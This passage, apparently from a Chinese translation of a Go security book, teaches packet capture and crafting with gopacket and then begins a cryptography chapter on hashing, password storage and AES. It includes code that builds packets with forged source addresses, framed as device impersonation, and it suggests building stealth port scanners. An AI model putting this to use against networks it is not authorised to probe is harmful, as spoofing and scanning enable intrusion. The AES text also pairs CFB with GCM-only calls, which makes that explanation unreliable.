这个例子使用了一个只捕获 TCP 端口80流量的过滤器,这应该是 HTTP 流量。它没有指定本地端口或远程端口是否为80,因此它将捕获任何进出的端口80流量。如果你在个人电脑上运行它,你可能没有运行 web 服务器,所以它将捕获你通过 web 浏览器进行的 HTTP 流量。如果你在 web 服务器上运行捕获,它将捕获传入的 HTTP 请求流量。

在这个例子中,使用pcap.OpenLive()创建了一个网络设备的句柄。在从设备读取数据包之前,使用handle.SetBPFFilter()设置了过滤器,然后从句柄中读取数据包。在en.wikipedia.org/wiki/Berkeley_Packet_Filter上了解更多关于过滤器的信息。

这个例子打开一个网络设备进行实时捕获,然后使用SetBPFFilter()设置一个过滤器。在这种情况下,我们将使用tcp and port 80过滤器来查找 HTTP 流量。捕获到的任何数据包都会被打印到标准输出:

package main

import (
   "fmt"
   "github.com/google/gopacket"
   "github.com/google/gopacket/pcap"
   "log"
   "time"
)

var (
   device            = "eth0"
   snapshotLen int32 = 1024
   promiscuous       = false
   err         error
   timeout     = 30 * time.Second
   handle      *pcap.Handle
)

func main() {
   // Open device
   handle, err = pcap.OpenLive(device, snapshotLen, promiscuous,  
      timeout)
   if err != nil {
      log.Fatal(err)
   }
   defer handle.Close()

   // Set filter
   var filter string = "tcp and port 80" // or os.Args[1]
   err = handle.SetBPFFilter(filter)
   if err != nil {
      log.Fatal(err)
   }
   fmt.Println("Only capturing TCP port 80 packets.")

   packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
   for packet := range packetSource.Packets() {
      // Do something with a packet here.
      fmt.Println(packet)
   }
}

将数据保存到 pcap 文件

该程序将执行数据包捕获并将结果存储在文件中。在这个例子中的重要步骤是调用pcapgo包——WriterWriteFileHeader()函数。之后,WritePacket()函数可以用来将所需的数据包写入文件。您可以捕获所有流量,并根据自己的过滤条件选择只写入特定的数据包,如果需要的话。也许您只想将奇数或格式错误的数据包写入日志以记录异常。

要使用tcpdump进行等效操作,只需使用-w标志和文件名,如下命令所示:

tcpdump -i eth0 -w my_capture.pcap

使用这个例子创建的 pcap 文件可以使用 Wireshark 打开,并且可以像使用tcpdump创建的文件一样查看。

这个例子创建了一个名为test.pcap的输出文件,并打开一个网络设备进行实时捕获。它将 100 个数据包捕获到文件中,然后退出:

package main

import (
   "fmt"
   "os"
   "time"

   "github.com/google/gopacket"
   "github.com/google/gopacket/layers"
   "github.com/google/gopacket/pcap"
   "github.com/google/gopacket/pcapgo"
)

var (
   deviceName        = "eth0"
   snapshotLen int32 = 1024
   promiscuous       = false
   err         error
   timeout     = -1 * time.Second
   handle      *pcap.Handle
   packetCount = 0
)

func main() {
   // Open output pcap file and write header
   f, _ := os.Create("test.pcap")
   w := pcapgo.NewWriter(f)
   w.WriteFileHeader(uint32(snapshotLen), layers.LinkTypeEthernet)
   defer f.Close()

   // Open the device for capturing
   handle, err = pcap.OpenLive(deviceName, snapshotLen, promiscuous, 
      timeout)
   if err != nil {
      fmt.Printf("Error opening device %s: %v", deviceName, err)
      os.Exit(1)
   }
   defer handle.Close()

   // Start processing packets
   packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
   for packet := range packetSource.Packets() {
      // Process packet here
      fmt.Println(packet)
      w.WritePacket(packet.Metadata().CaptureInfo, packet.Data())
      packetCount++

      // Only capture 100 and then stop
      if packetCount > 100 {
         break
      }
   }
}

从 pcap 文件中读取

您可以打开一个 pcap 文件进行离线检查,而不是打开一个设备进行实时捕获。无论是从pcap.OpenLive()还是pcap.OpenOffline()获取了一个句柄之后,该句柄都会被同等对待。一旦创建了句柄,实时设备和捕获文件之间就没有区别,只是实时设备将继续传递数据包,而文件最终会结束。

您可以使用任何libpcap客户端捕获的 pcap 文件,包括 Wireshark、tcpdump或其他gopacket应用程序。这个例子使用pcap.OpenOffline()打开一个名为test.pcap的文件,然后使用range迭代数据包并打印基本数据包信息。将文件名从test.pcap更改为您想要读取的任何文件:

package main

// Use tcpdump to create a test file
// tcpdump -w test.pcap
// or use the example above for writing pcap files

import (
   "fmt"
   "github.com/google/gopacket"
   "github.com/google/gopacket/pcap"
   "log"
)

var (
   pcapFile = "test.pcap"
   handle   *pcap.Handle
   err      error
)

func main() {
   // Open file instead of device
   handle, err = pcap.OpenOffline(pcapFile)
   if err != nil {
      log.Fatal(err)
   }
   defer handle.Close()

   // Loop through packets in file
   packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
   for packet := range packetSource.Packets() {
      fmt.Println(packet)
   }
}

解码数据包层

数据包可以使用packet.Layer()函数逐层解码。该程序将检查数据包,查找 TCP 流量,然后输出以太网层、IP 层、TCP 层和应用层信息。当需要检查流量并根据信息做出决定时,这是非常有用的。当它到达应用层时,它会查找HTTP关键字,如果检测到,则打印一条消息:

package main

import (
   "fmt"
   "github.com/google/gopacket"
   "github.com/google/gopacket/layers"
   "github.com/google/gopacket/pcap"
   "log"
   "strings"
   "time"
)

var (
   device            = "eth0"
   snapshotLen int32 = 1024
   promiscuous       = false
   err         error
   timeout     = 30 * time.Second
   handle      *pcap.Handle
)

func main() {
   // Open device
   handle, err = pcap.OpenLive(device, snapshotLen, promiscuous, 
      timeout)
   if err != nil {
      log.Fatal(err)
   }
   defer handle.Close()

   packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
   for packet := range packetSource.Packets() {
      printPacketInfo(packet)
   }
}

func printPacketInfo(packet gopacket.Packet) {
   // Let's see if the packet is an ethernet packet
   ethernetLayer := packet.Layer(layers.LayerTypeEthernet)
   if ethernetLayer != nil {
      fmt.Println("Ethernet layer detected.")
      ethernetPacket, _ := ethernetLayer.(*layers.Ethernet)
      fmt.Println("Source MAC: ", ethernetPacket.SrcMAC)
      fmt.Println("Destination MAC: ", ethernetPacket.DstMAC)
      // Ethernet type is typically IPv4 but could be ARP or other
      fmt.Println("Ethernet type: ", ethernetPacket.EthernetType)
      fmt.Println()
   }

   // Let's see if the packet is IP (even though the ether type told 
   //us)
   ipLayer := packet.Layer(layers.LayerTypeIPv4)
   if ipLayer != nil {
      fmt.Println("IPv4 layer detected.")
      ip, _ := ipLayer.(*layers.IPv4)

      // IP layer variables:
      // Version (Either 4 or 6)
      // IHL (IP Header Length in 32-bit words)
      // TOS, Length, Id, Flags, FragOffset, TTL, Protocol (TCP?),
      // Checksum, SrcIP, DstIP
      fmt.Printf("From %s to %s\n", ip.SrcIP, ip.DstIP)
      fmt.Println("Protocol: ", ip.Protocol)
      fmt.Println()
   }

   // Let's see if the packet is TCP
   tcpLayer := packet.Layer(layers.LayerTypeTCP)
   if tcpLayer != nil {
      fmt.Println("TCP layer detected.")
      tcp, _ := tcpLayer.(*layers.TCP)

      // TCP layer variables:
      // SrcPort, DstPort, Seq, Ack, DataOffset, Window, Checksum, 
      //Urgent
      // Bool flags: FIN, SYN, RST, PSH, ACK, URG, ECE, CWR, NS
      fmt.Printf("From port %d to %d\n", tcp.SrcPort, tcp.DstPort)
      fmt.Println("Sequence number: ", tcp.Seq)
      fmt.Println()
   }

   // Iterate over all layers, printing out each layer type
   fmt.Println("All packet layers:")
   for _, layer := range packet.Layers() {
      fmt.Println("- ", layer.LayerType())
   }

   // When iterating through packet.Layers() above,
   // if it lists Payload layer then that is the same as
   // this applicationLayer. applicationLayer contains the payload
   applicationLayer := packet.ApplicationLayer()
   if applicationLayer != nil {
      fmt.Println("Application layer/Payload found.")
      fmt.Printf("%s\n", applicationLayer.Payload())

      // Search for a string inside the payload
      if strings.Contains(string(applicationLayer.Payload()), "HTTP")    
      {
         fmt.Println("HTTP found!")
      }
   }

   // Check for errors
   if err := packet.ErrorLayer(); err != nil {
      fmt.Println("Error decoding some part of the packet:", err)
   }
}

创建自定义层

您不仅限于最常见的层,比如以太网、IP 和 TCP。您可以创建自己的层。对于大多数人来说,这种用途有限,但在一些极端罕见的情况下,用自定义层替换 TCP 层以满足特定要求可能是有意义的。

这个例子演示了如何创建一个自定义层。这对于实现gopacket/layers包中尚未包含的协议非常有用。gopacket中已经包含了 100 多种层类型。您可以在任何级别创建自定义层。

这段代码的第一件事是定义一个自定义数据结构来表示我们的层。数据结构不仅保存我们的自定义数据(SomeByteAnotherByte),还需要一个字节片来存储实际负载的其余部分,以及其他层(restOfData):

package main

import (
   "fmt"
   "github.com/google/gopacket"
)

// Create custom layer structure
type CustomLayer struct {
   // This layer just has two bytes at the front
   SomeByte    byte
   AnotherByte byte
   restOfData  []byte
}

// Register the layer type so we can use it
// The first argument is an ID. Use negative
// or 2000+ for custom layers. It must be unique
var CustomLayerType = gopacket.RegisterLayerType(
   2001,
   gopacket.LayerTypeMetadata{
      "CustomLayerType",
      gopacket.DecodeFunc(decodeCustomLayer),
   },
)

// When we inquire about the type, what type of layer should
// we say it is? We want it to return our custom layer type
func (l CustomLayer) LayerType() gopacket.LayerType {
   return CustomLayerType
}

// LayerContents returns the information that our layer
// provides. In this case it is a header layer so
// we return the header information
func (l CustomLayer) LayerContents() []byte {
   return []byte{l.SomeByte, l.AnotherByte}
}

// LayerPayload returns the subsequent layer built
// on top of our layer or raw payload
func (l CustomLayer) LayerPayload() []byte {
   return l.restOfData
}

// Custom decode function. We can name it whatever we want
// but it should have the same arguments and return value
// When the layer is registered we tell it to use this decode function
func decodeCustomLayer(data []byte, p gopacket.PacketBuilder) error {
   // AddLayer appends to the list of layers that the packet has
   p.AddLayer(&CustomLayer{data[0], data[1], data[2:]})

   // The return value tells the packet what layer to expect
   // with the rest of the data. It could be another header layer,
   // nothing, or a payload layer.

   // nil means this is the last layer. No more decoding
   // return nil
   // Returning another layer type tells it to decode
   // the next layer with that layer's decoder function
   // return p.NextDecoder(layers.LayerTypeEthernet)

   // Returning payload type means the rest of the data
   // is raw payload. It will set the application layer
   // contents with the payload
   return p.NextDecoder(gopacket.LayerTypePayload)
}

func main() {
   // If you create your own encoding and decoding you can essentially
   // create your own protocol or implement a protocol that is not
   // already defined in the layers package. In our example we are    
   // just wrapping a normal ethernet packet with our own layer.
   // Creating your own protocol is good if you want to create
   // some obfuscated binary data type that was difficult for others
   // to decode. Finally, decode your packets:
   rawBytes := []byte{0xF0, 0x0F, 65, 65, 66, 67, 68}
   packet := gopacket.NewPacket(
      rawBytes,
      CustomLayerType,
      gopacket.Default,
   )
   fmt.Println("Created packet out of raw bytes.")
   fmt.Println(packet)

   // Decode the packet as our custom layer
   customLayer := packet.Layer(CustomLayerType)
   if customLayer != nil {
      fmt.Println("Packet was successfully decoded.")
      customLayerContent, _ := customLayer.(*CustomLayer)
      // Now we can access the elements of the custom struct
      fmt.Println("Payload: ", customLayerContent.LayerPayload())
      fmt.Println("SomeByte element:", customLayerContent.SomeByte)
      fmt.Println("AnotherByte element:",  
         customLayerContent.AnotherByte)
   }
}

将字节转换为数据包和从数据包转换

在某些情况下,可能有原始字节,您希望将其转换为数据包,或者反之亦然。这个例子创建了一个简单的数据包,然后获取组成数据包的原始字节。然后取这些原始字节并将其转换回数据包以演示这个过程。

在这个例子中,我们将使用gopacket.SerializeLayers()创建和序列化一个数据包。数据包由几个层组成:以太网、IP、TCP 和有效负载。在序列化过程中,如果任何数据包返回为 nil,这意味着它无法解码成正确的层(格式错误或不正确的数据包类型)。将数据包序列化到缓冲区后,我们将得到组成数据包的原始字节的副本,使用buffer.Bytes()。有了原始字节,我们可以使用gopacket.NewPacket()逐层解码数据。通过利用SerializeLayers(),您可以将数据包结构转换为原始字节,并使用gopacket.NewPacket(),您可以将原始字节转换回结构化数据。

NewPacket()将原始字节作为第一个参数。第二个参数是您想要解码的最底层层。它将解码该层以及其上的所有层。NewPacket()的第三个参数是解码类型,必须是以下之一:

  • gopacket.Default:这是一次性解码所有内容,也是最安全的。

  • gopacket.Lazy:这是按需解码,但不是并发安全的。

  • gopacket.NoCopy:这不会创建缓冲区的副本。只有在您可以保证内存中的数据包数据不会更改时才使用它

以下是将数据包结构转换为字节,然后再转换回数据包的完整代码:

package main

import (
   "fmt"
   "github.com/google/gopacket"
   "github.com/google/gopacket/layers"
)

func main() {
   payload := []byte{2, 4, 6}
   options := gopacket.SerializeOptions{}
   buffer := gopacket.NewSerializeBuffer()
   gopacket.SerializeLayers(buffer, options,
      &layers.Ethernet{},
      &layers.IPv4{},
      &layers.TCP{},
      gopacket.Payload(payload),
   )
   rawBytes := buffer.Bytes()

   // Decode an ethernet packet
   ethPacket :=
      gopacket.NewPacket(
         rawBytes,
         layers.LayerTypeEthernet,
         gopacket.Default,
      )

   // with Lazy decoding it will only decode what it needs when it 
   //needs it
   // This is not concurrency safe. If using concurrency, use default
   ipPacket :=
      gopacket.NewPacket(
         rawBytes,
         layers.LayerTypeIPv4,
         gopacket.Lazy,
      )

   // With the NoCopy option, the underlying slices are referenced
   // directly and not copied. If the underlying bytes change so will
   // the packet
   tcpPacket :=
      gopacket.NewPacket(
         rawBytes,
         layers.LayerTypeTCP,
         gopacket.NoCopy,
      )

   fmt.Println(ethPacket)
   fmt.Println(ipPacket)
   fmt.Println(tcpPacket)
}

创建和发送数据包

这个例子做了几件事。首先,它将向您展示如何使用网络设备发送原始字节,这样您就可以几乎像串行连接一样使用它来发送数据。这对于真正的低级数据传输很有用,但如果您想与应用程序交互,您可能希望构建一个其他硬件和软件可以识别的数据包。

它接下来要做的事情是向您展示如何创建一个包含以太网、IP 和 TCP 层的数据包。不过,所有内容都是默认和空的,所以实际上并没有做任何事情。

最后,我们将创建另一个数据包,但实际上会为以太网层填写一些 MAC 地址,为 IPv4 填写一些 IP 地址,为 TCP 层填写一些端口号。您应该看到如何伪造数据包并冒充设备。

TCP 层结构具有SYNFINACK标志的布尔字段,可以读取或设置。这对于操纵和模糊化 TCP 握手、会话和端口扫描非常有用。

pcap库提供了一种发送字节的简单方法,但gopacket中的layers包协助我们创建了几个层的字节结构。

以下是此示例的代码实现:

package main

import (
   "github.com/google/gopacket"
   "github.com/google/gopacket/layers"
   "github.com/google/gopacket/pcap"
   "log"
   "net"
   "time"
)

var (
   device            = "eth0"
   snapshotLen int32 = 1024
   promiscuous       = false
   err         error
   timeout     = 30 * time.Second
   handle      *pcap.Handle
   buffer      gopacket.SerializeBuffer
   options     gopacket.SerializeOptions
)

func main() {
   // Open device
   handle, err = pcap.OpenLive(device, snapshotLen, promiscuous, 
      timeout)
   if err != nil {
      log.Fatal("Error opening device. ", err)
   }
   defer handle.Close()

   // Send raw bytes over wire
   rawBytes := []byte{10, 20, 30}
   err = handle.WritePacketData(rawBytes)
   if err != nil {
      log.Fatal("Error writing bytes to network device. ", err)
   }

   // Create a properly formed packet, just with
   // empty details. Should fill out MAC addresses,
   // IP addresses, etc.
   buffer = gopacket.NewSerializeBuffer()
   gopacket.SerializeLayers(buffer, options,
      &layers.Ethernet{},
      &layers.IPv4{},
      &layers.TCP{},
      gopacket.Payload(rawBytes),
   )
   outgoingPacket := buffer.Bytes()
   // Send our packet
   err = handle.WritePacketData(outgoingPacket)
   if err != nil {
      log.Fatal("Error sending packet to network device. ", err)
   }

   // This time lets fill out some information
   ipLayer := &layers.IPv4{
      SrcIP: net.IP{127, 0, 0, 1},
      DstIP: net.IP{8, 8, 8, 8},
   }
   ethernetLayer := &layers.Ethernet{
      SrcMAC: net.HardwareAddr{0xFF, 0xAA, 0xFA, 0xAA, 0xFF, 0xAA},
      DstMAC: net.HardwareAddr{0xBD, 0xBD, 0xBD, 0xBD, 0xBD, 0xBD},
   }
   tcpLayer := &layers.TCP{
      SrcPort: layers.TCPPort(4321),
      DstPort: layers.TCPPort(80),
   }
   // And create the packet with the layers
   buffer = gopacket.NewSerializeBuffer()
   gopacket.SerializeLayers(buffer, options,
      ethernetLayer,
      ipLayer,
      tcpLayer,
      gopacket.Payload(rawBytes),
   )
   outgoingPacket = buffer.Bytes()
}

更快地解码数据包

如果我们知道要期望的层,我们可以使用现有的结构来存储数据包信息,而不是为每个数据包创建新的结构,这需要时间和内存。使用DecodingLayerParser更快。这就像编组和解组数据。

这个例子演示了如何在程序开始时创建层变量,并重复使用相同的变量,而不是为每个数据包创建新的变量。使用gopacket.NewDecodingLayerParser()创建一个解析器,我们提供了要使用的层变量。这里的一个注意事项是,它只会解码最初创建的层类型。

以下是此示例的代码实现:

package main

import (
   "fmt"
   "github.com/google/gopacket"
   "github.com/google/gopacket/layers"
   "github.com/google/gopacket/pcap"
   "log"
   "time"
)

var (
   device            = "eth0"
   snapshotLen int32 = 1024
   promiscuous       = false
   err         error
   timeout     = 30 * time.Second
   handle      *pcap.Handle
   // Reuse these for each packet
   ethLayer layers.Ethernet
   ipLayer  layers.IPv4
   tcpLayer layers.TCP
)

func main() {
   // Open device
   handle, err = pcap.OpenLive(device, snapshotLen, promiscuous, 
   timeout)
   if err != nil {
      log.Fatal(err)
   }
   defer handle.Close()

   packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
   for packet := range packetSource.Packets() {
      parser := gopacket.NewDecodingLayerParser(
         layers.LayerTypeEthernet,
         &ethLayer,
         &ipLayer,
         &tcpLayer,
      )
      foundLayerTypes := []gopacket.LayerType{}

      err := parser.DecodeLayers(packet.Data(), &foundLayerTypes)
      if err != nil {
         fmt.Println("Trouble decoding layers: ", err)
      }

      for _, layerType := range foundLayerTypes {
         if layerType == layers.LayerTypeIPv4 {
            fmt.Println("IPv4: ", ipLayer.SrcIP, "->", ipLayer.DstIP)
         }
         if layerType == layers.LayerTypeTCP {
            fmt.Println("TCP Port: ", tcpLayer.SrcPort,               
               "->", tcpLayer.DstPort)
            fmt.Println("TCP SYN:", tcpLayer.SYN, " | ACK:", 
               tcpLayer.ACK)
         }
      }
   }
}

总结

阅读完本章后,您现在应该对gopacket包有很好的理解。您应该能够使用本章的示例编写一个简单的数据包捕获应用程序。再次强调,重要的不是记住所有的函数或层的细节。重要的是以高层次理解整体情况,并能够回忆起在范围和实施应用程序时可用的工具。

尝试根据这些示例编写自己的程序,以捕获来自您的计算机的有趣的网络流量。尝试捕获和检查特定端口或应用程序,以查看它在网络上传输时的工作方式。查看使用加密和以明文传输数据的应用程序之间的区别。您可能只是想捕获后台正在进行的所有流量,并查看在您空闲时哪些应用程序在网络上忙碌。

使用gopacket库可以构建各种有用的工具。除了基本的数据包捕获以供以后审查之外,您还可以实现一个监控系统,当识别到大量流量激增或发现异常流量时发出警报。

由于gopacket库也可以用于发送数据包,因此可以创建高度定制的端口扫描器。您可以制作原始数据包来执行仅进行 TCP SYN 扫描的操作,其中连接从未完全建立;XMAS 扫描,其中所有标志都被打开;NULL 扫描,其中每个字段都设置为 null;以及一系列其他需要对发送的数据包进行完全控制的扫描,包括故意发送格式错误的数据包。您还可以构建模糊测试器,向网络服务发送错误的数据包,以查看其行为。因此,看看您能想出什么样的想法。

在下一章中,我们将学习使用 Go 进行加密。我们将首先看一下哈希、校验和以及安全存储密码。然后我们将研究对称和非对称加密,它们是什么,它们的区别,为什么它们有用,以及如何在 Go 中使用它们。我们将学习如何创建带有证书的加密服务器,以及如何使用加密客户端进行连接。理解加密的应用对于现代安全至关重要,因此我们将研究最常见和实际的用例。

第六章:密码学

加密是一种在第三方可以查看通信时保护通信的实践。有双向对称和非对称加密方法,以及单向哈希算法。

加密是现代互联网的关键部分。有了LetsEncrypt.com等服务,每个人都可以获得受信任的 SSL 证书。我们的整个基础设施都依赖于加密来保护所有机密数据。正确加密和正确哈希数据非常重要,而且很容易配置错误的服务,使其容易受到攻击或暴露。

本章涵盖以下示例和用例:

  • 对称和非对称加密

  • 签名和验证消息

  • 哈希处理

  • 安全存储密码

  • 生成安全的随机数

  • 创建和使用 TLS/SSL 证书

哈希处理

哈希是将可变长度消息转换为唯一的固定长度的字母数字字符串。有各种可用的哈希算法,如 MD5 和 SHA1。哈希是单向且不可逆的,不像对称加密函数(如 AES),如果您有密钥,可以恢复原始消息。由于哈希无法被反转,大多数哈希都会被暴力破解。破解者将构建功耗巨大的装置,配备多个 GPU,以对每个可能的字符组合进行哈希,直到找到与之匹配的哈希。他们还会生成彩虹表或包含所有已生成哈希输出的文件,以进行快速查找。

因此,对哈希进行加盐很重要。加盐是向用户提供的密码末尾添加随机字符串的过程,以增加更多的随机性或熵。考虑一个存储用户登录信息和哈希密码以进行身份验证的应用程序。如果两个用户使用相同的密码,则它们的哈希输出将相同。没有盐,破解者可能会找到多个使用相同密码的人,并且只需要破解一次哈希。通过为每个用户的密码添加唯一的盐,您确保每个用户都具有唯一的哈希值。加盐减少了彩虹表的有效性,因为即使他们知道与每个哈希相关的盐,他们也必须为每个盐生成一个彩虹表,这是耗时的。

哈希通常用于验证密码。另一个常见用途是用于文件完整性。大型下载通常附带文件的 MD5 或 SHA1 哈希。下载后,您可以对文件进行哈希处理,以确保其与预期值匹配。如果不匹配,则下载文件已被修改。哈希还用作记录妥协指标或 IOC 的一种方式。已知恶意或危险的文件会被哈希处理,并且该哈希将存储在目录中。这些通常是公开共享的,以便人们可以检查可疑文件是否存在已知风险。与整个文件相比,存储和比较哈希要高效得多。

对小文件进行哈希处理

如果文件小到可以包含在内存中,ReadFile()方法可以快速工作。它将整个文件加载到内存中,然后对数据进行摘要。将使用多种不同的哈希算法进行计算:

package main

import (
   "crypto/md5"
   "crypto/sha1"
   "crypto/sha256"
   "crypto/sha512"
   "fmt"
   "io/ioutil"
   "log"
   "os"
)

func printUsage() {
   fmt.Println("Usage: " + os.Args[0] + " <filepath>")
   fmt.Println("Example: " + os.Args[0] + " document.txt")
}

func checkArgs() string {
   if len(os.Args) < 2 {
      printUsage()
      os.Exit(1)
   }
   return os.Args[1]
}

func main() {
   filename := checkArgs()

   // Get bytes from file
   data, err := ioutil.ReadFile(filename)
   if err != nil {
      log.Fatal(err)
   }

   // Hash the file and output results
   fmt.Printf("Md5: %x\n\n", md5.Sum(data))
   fmt.Printf("Sha1: %x\n\n", sha1.Sum(data))
   fmt.Printf("Sha256: %x\n\n", sha256.Sum256(data))
   fmt.Printf("Sha512: %x\n\n", sha512.Sum512(data))
}

对大文件进行哈希处理

在前面的哈希示例中,要进行哈希处理的整个文件在哈希之前被加载到内存中。当文件达到一定大小时,这是不切实际甚至不可能的。物理内存限制将起作用。因为哈希是作为块密码实现的,它将一次操作一个块,而无需一次性将整个文件加载到内存中:

package main

import (
   "crypto/md5"
   "fmt"
   "io"
   "log"
   "os"
)

func printUsage() {
   fmt.Println("Usage: " + os.Args[0] + " <filename>")
   fmt.Println("Example: " + os.Args[0] + " diskimage.iso")
}

func checkArgs() string {
   if len(os.Args) < 2 {
      printUsage()
      os.Exit(1)
   }
   return os.Args[1]
}

func main() {
   filename := checkArgs()

   // Open file for reading
   file, err := os.Open(filename)
   if err != nil {
      log.Fatal(err)
   }
   defer file.Close()

   // Create new hasher, which is a writer interface
   hasher := md5.New()

   // Default buffer size for copying is 32*1024 or 32kb per copy
   // Use io.CopyBuffer() if you want to specify the buffer to use
   // It will write 32kb at a time to the digest/hash until EOF
   // The hasher implements a Write() function making it satisfy
   // the writer interface. The Write() function performs the digest
   // at the time the data is copied/written to it. It digests
   // and processes the hash one chunk at a time as it is received.
   _, err = io.Copy(hasher, file)
   if err != nil {
      log.Fatal(err)
   }

   // Now get the final sum or checksum.
   // We pass nil to the Sum() function because
   // we already copied the bytes via the Copy to the
   // writer interface and don't need to pass any new bytes
   checksum := hasher.Sum(nil)

   fmt.Printf("Md5 checksum: %x\n", checksum)
}

安全存储密码

现在我们知道如何哈希,我们可以谈论安全地存储密码。哈希是保护密码的重要因素。其他重要因素是加盐,使用密码学强哈希函数,以及可选使用基于哈希的消息认证码(HMAC),这些都在哈希算法中添加了一个额外的秘密密钥。

HMAC 是一个使用秘钥的附加层;因此,即使攻击者获得了带有盐的哈希密码数据库,没有秘密密钥,他们仍然会很难破解它们。秘密密钥应该存储在一个单独的位置,比如环境变量,而不是与哈希密码和盐一起存储在数据库中。

这个示例应用程序的用途有限。将其用作您自己应用程序的参考。

package main

import (
   "crypto/hmac"
   "crypto/rand"
   "crypto/sha256"
   "encoding/base64"
   "encoding/hex"
   "fmt"
   "io"
   "os"
)

func printUsage() {
   fmt.Println("Usage: " + os.Args[0] + " <password>")
   fmt.Println("Example: " + os.Args[0] + " Password1!")
}

func checkArgs() string {
   if len(os.Args) < 2 {
      printUsage()
      os.Exit(1)
   }
   return os.Args[1]
}

// secretKey should be unique, protected, private,
// and not hard-coded like this. Store in environment var
// or in a secure configuration file.
// This is an arbitrary key that should only be used 
// for example purposes.
var secretKey = "neictr98y85klfgneghre"

// Create a salt string with 32 bytes of crypto/rand data
func generateSalt() string {
   randomBytes := make([]byte, 32)
   _, err := rand.Read(randomBytes)
   if err != nil {
      return ""
   }
   return base64.URLEncoding.EncodeToString(randomBytes)
}

// Hash a password with the salt
func hashPassword(plainText string, salt string) string {
   hash := hmac.New(sha256.New, []byte(secretKey))
   io.WriteString(hash, plainText+salt)
   hashedValue := hash.Sum(nil)
   return hex.EncodeToString(hashedValue)
}

func main() {
   // Get the password from command line argument
   password := checkArgs()
   salt := generateSalt()
   hashedPassword := hashPassword(password, salt)
   fmt.Println("Password: " + password)
   fmt.Println("Salt: " + salt)
   fmt.Println("Hashed password: " + hashedPassword)
}

加密

加密与哈希不同,因为它是可逆的,原始消息可以被恢复。有对称加密方法使用密码或共享密钥进行加密和解密。还有非对称加密算法使用公钥和私钥对。AES 是对称加密的一个例子,用于加密 ZIP 文件、PDF 文件或整个文件系统。RSA 是非对称加密的一个例子,用于 SSL、SSH 密钥和 PGP。

密码学安全伪随机数生成器(CSPRNG)

mathrand包提供的随机性不如crypto/rand包。不要将math/rand用于加密应用。

golang.org/pkg/crypto/rand/上了解更多关于 Go 的crypto/rand包的信息。

以下示例将演示如何生成随机字节、随机整数或任何其他有符号或无符号类型的整数:

package main

import (
   "crypto/rand"
   "encoding/binary"
   "fmt"
   "log"
   "math"
   "math/big"
)

func main() {
   // Generate a random int
   limit := int64(math.MaxInt64) // Highest random number allowed
   randInt, err := rand.Int(rand.Reader, big.NewInt(limit))
   if err != nil {
      log.Fatal(err)
   }
   fmt.Println("Random int value: ", randInt)

   // Alternatively, you could generate the random bytes
   // and turn them into the specific data type needed.
   // binary.Read() will only read enough bytes to fill the data type
   var number uint32
   err = binary.Read(rand.Reader, binary.BigEndian, &number)
   if err != nil {
      log.Fatal(err)
   }
   fmt.Println("Random uint32 value: ", number)

   // Or just generate a random byte slice
   numBytes := 4
   randomBytes := make([]byte, numBytes)
   rand.Read(randomBytes)
   fmt.Println("Random byte values: ", randomBytes)
}

对称加密

对称加密是指使用相同的密钥或密码来加密和解密数据。高级加密标准,也称为 AES 或 Rijndael,是 NIST 在 2001 年制定的对称加密算法标准。

数据加密标准(DES)是另一种对称加密算法,比 AES 更老且不太安全。除非有特定要求或规范,否则不应该使用 DES 而不是 AES。Go 标准库包括 AES 和 DES 包。

AES

该程序将使用一个 32 字节(256 位)的密码来加密和解密文件。

在生成密钥、加密或解密时,输出通常发送到STDOUT或终端。您可以使用>运算符将输出轻松重定向到文件或另一个程序。请参考用法模式以获取示例。如果需要将密钥或加密数据存储为 ASCII 编码的字符串,请使用 base64 编码。

在这个示例中的某个时候,您会看到消息被分成两部分,IV 和密文。初始化向量或 IV 是一个随机值,它被预置到实际加密的消息之前。每次使用 AES 加密消息时,都会生成并使用一个随机值作为加密的一部分。这个随机值被称为一次性号码,简单地意味着只使用一次的数字。

为什么要创建这些一次性值?特别是如果它们不保密,并且直接放在加密消息的前面,它有什么作用?随机 IV 的使用方式类似于盐。它主要用于当相同的消息被重复加密时,每次的密文都是不同的。

要使用Galois/Counter Mode(GCM)而不是 CFB,请更改加密和解密方法。GCM 具有更好的性能和效率,因为它允许并行处理。在en.wikipedia.org/wiki/Galois/Counter_Mode上了解更多关于 GCM 的信息。

从 AES 密码开始,并调用cipher.NewCFBEncrypter(block, iv)。然后根据您是否需要加密或解密,您将使用您生成的 nonce 调用.Seal(),或者调用.Open()并传递分离的 nonce 和密文:

package main

import (
   "crypto/aes"
   "crypto/cipher"
   "crypto/rand"
   "fmt"
   "io"
   "io/ioutil"
   "os"
   "log"
)

func printUsage() {
   fmt.Printf(os.Args[0] + `

Encrypt or decrypt a file using AES with a 256-bit key file.
This program can also generate 256-bit keys.

Usage:
  ` + os.Args[0] + ` [-h|--help]
  ` + os.Args[0] + ` [-g|--genkey]
  ` + os.Args[0] + ` <keyFile> <file> [-d|--decrypt]

Examples:
  # Generate a 32-byte (256-bit) key
  ` + os.Args[0] + ` --genkey

  # Encrypt with secret key. Output to STDOUT
  ` + os.Args[0] + ` --genkey > secret.key

  # Encrypt message using secret key. Output to ciphertext.dat
  ` + os.Args[0] + ` secret.key message.txt > ciphertext.dat

  # Decrypt message using secret key. Output to STDOUT
  ` + os.Args[0] + ` secret.key ciphertext.dat -d

  # Decrypt message using secret key. Output to message.txt
  ` + os.Args[0] + ` secret.key ciphertext.dat -d > cleartext.txt
`)
}

// Check command-line arguments.
// If the help or generate key functions are chosen
// they are run and then the program exits
// otherwise it returns keyFile, file, decryptFlag.
func checkArgs() (string, string, bool) {
   if len(os.Args) < 2  || len(os.Args) > 4 {
      printUsage()
      os.Exit(1)
   }

   // One arg provided
   if len(os.Args) == 2 {
      // Only -h, --help and --genkey are valid one-argument uses
      if os.Args[1] == "-h" || os.Args[1] == "--help" {
         printUsage() // Print help text
         os.Exit(0) // Exit gracefully no error
      }
      if os.Args[1] == "-g" || os.Args[1] == "--genkey" {
         // Generate a key and print to STDOUT
         // User should redirect output to a file if needed
         key := generateKey()
         fmt.Printf(string(key[:])) // No newline
         os.Exit(0) // Exit gracefully
      }
   }

   // The only use options left is
   // encrypt <keyFile> <file> [-d|--decrypt]
   // If there are only 2 args provided, they must be the
   // keyFile and file without a decrypt flag.
   if len(os.Args) == 3 {
      // keyFile, file, decryptFlag
      return os.Args[1], os.Args[2], false 
   }
   // If 3 args are provided,
